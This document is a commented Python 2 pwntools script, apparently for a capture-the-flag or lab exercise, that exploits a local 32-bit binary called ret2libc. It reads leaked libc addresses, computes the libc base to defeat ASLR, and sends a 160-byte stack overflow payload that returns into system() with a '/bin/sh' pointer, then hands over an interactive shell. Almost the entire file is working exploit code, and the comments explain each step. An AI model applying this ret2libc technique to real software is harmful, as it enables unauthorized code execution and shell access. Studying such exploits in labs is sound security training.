

```python
#!/usr/bin/python
from pwn import *
# Python 2 pwntools script (note the print statements). It starts the local
# ./ret2libc binary, parses the addresses that binary prints, derives where
# libc is mapped in the process, and sends one overflow payload built from
# those values.
r = process('./ret2libc') # local target binary, started as a child process
libc = ELF('/lib/i386-linux-gnu/libc.so.6') # 32-bit libc file whose symbols are parsed

# File-relative offsets taken from the libc on disk. They only match the
# running process if it maps this same libc build -- TODO confirm (e.g. with
# ldd on the binary); a different build makes every derived address wrong.
read_offset = libc.symbols['read']
system_offset = libc.symbols['system']
binsh_offset = list(libc.search('/bin/sh'))[0]  # first occurrence of the string in libc

# The binary prints several pointers after fixed labels. Each recv(10) takes
# ten characters, which fits "0x" plus eight hex digits of a 32-bit pointer.
r.recvuntil('puts: ')
puts_addr = int(r.recv(10), 16)
# NOTE(review): this label has no colon, unlike the others -- confirm against
# the binary's real output, otherwise recv(10) may start on the wrong byte.
r.recvuntil('fflush ')
fflush_addr = int(r.recv(10), 16)
r.recvuntil('read: ')
read_addr = int(r.recv(10), 16)
r.recvuntil('write: ')
write_addr = int(r.recv(10), 16)
r.recvuntil('useful_string: ')
binsh_addr = int(r.recv(10), 16)

# One disclosed libc pointer is enough to place the whole library: symbols
# keep their relative distances, so runtime address minus file offset gives
# the load base, and ASLR no longer hides anything in libc. This is why an
# address disclosure counts as a finding on its own.
libc_base = read_addr - read_offset
system_addr = libc_base + system_offset
binsh = libc_base + binsh_offset

# Diagnostics only. puts_addr, fflush_addr, write_addr and binsh_addr are
# printed here and not used in the payload; the string pointer that is sent
# is the one computed inside libc (binsh), not the leaked 'useful_string'.
print hex(puts_addr)
print hex(fflush_addr)
print hex(read_addr)
print hex(write_addr)
print hex(binsh_addr)
print hex(system_addr)
print hex(binsh)

# Payload layout: 160 filler bytes, a 4-byte little-endian address of
# system(), 4 more filler bytes, then the 4-byte address of "/bin/sh".
# Presumably 160 is the distance from the buffer to the saved return address
# in this particular binary (not visible here), and the 4 filler bytes sit
# where the called function would look for its own return address, with the
# string pointer as its first stack argument (32-bit cdecl) -- TODO confirm.
# No canary value is read or replayed, so this appears to rely on the binary
# being built without stack protection; a canary or a build that does not
# print its own pointers would break each step above.
payload = "A"*160
payload += p32(system_addr)
payload += "A"*4
payload += p32(binsh)

r.sendline(payload)
# pause() blocks until a key is pressed, leaving time to attach a debugger
# to the child process and inspect the stack before continuing.
pause()
# Connects the terminal to the child process's input and output.
r.interactive()
```